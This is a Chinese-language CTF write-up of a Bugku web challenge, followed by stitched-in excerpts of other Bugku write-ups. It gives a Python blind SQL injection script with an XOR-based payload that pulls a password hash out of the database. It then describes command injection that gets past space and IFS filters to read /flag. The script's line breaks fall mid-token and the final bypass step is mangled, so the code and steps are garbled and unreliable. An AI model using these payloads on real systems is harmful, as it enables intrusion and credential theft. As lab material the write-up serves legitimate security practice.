進去是個登入介面,稍微按了按導航欄沒什麼用,猜測是注入!
輸入使用者admin
密碼任意
,顯示password錯誤
輸入使用者admin'
密碼任意
,顯示username錯誤
輸入使用者admin'#
密碼任意
,發現給檢測到入侵,那#用不了,試了試-
和+
也被過濾了
那這裡就能看出是盲注了,放指令碼:
# -*- coding: utf-8 -*-
import requests
session = requests.session(
)url=
""flag=
''for i in
range(1
,250):
left=
32 right=
128 mid=
(left+right)//2
while
(left
: payload=
"admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1"
%(i,mid)
data =
res = requests.post(url, data=data)
if'password'
in res.text:
left=mid+
1else
: right=mid
mid=
(left+right)//2
if(mid==
32or mid==
127)
:break
flag=flag+
chr(mid)
print
(flag)
我這裡就是直接最後一步,能夠跑出一串字串
猜測是md5,去解碼得到bugkuctf
使用使用者admin
密碼bugkuctf
來登入,來到乙個web的命令執行介面,使用ls看到**目錄下並沒有flag
使用ls /
發現給檢測到,試試單輸入空格
,發現空格給過濾,在linux裡面有很多方式可以代替空格
嘗試輸入cat$/flag
發現也給檢測了,測試後才知道ifs字樣也給過濾了,那我們用cat,就能成功拿到flag。
Bugku web 字元?正則?
開啟題目鏈結,有如下 highlight file 2.php key key im preg match key.key.key key a z punct i trim get id match if im 函式preg match功能為用正規表示式匹配字串,如果匹配成功,返回值1,並把匹配到的...
Bugku web 各種繞過
開啟題目連線,獲得原始碼 highlight file flag.php get id urldecode get id flag flag if isset get uname and isset post passwd 分析 需要利用sha1 不能處理陣列的漏洞,如果傳入的值為陣列,則sha1會...
Bugku WEB 冬至紅包
開啟網頁 顯然是 審計了,分析 當沒有用get方法傳入flag時,會顯示click here的鏈結。點選鏈結會用get方法傳入一串字串 exam,後面是當前時間的一串sha1雜湊值。判斷傳入的flag長度與 exam是否相同,不同則顯示 長度不允許 第二個判斷過濾了一大堆 第三個判斷傳入flag的值...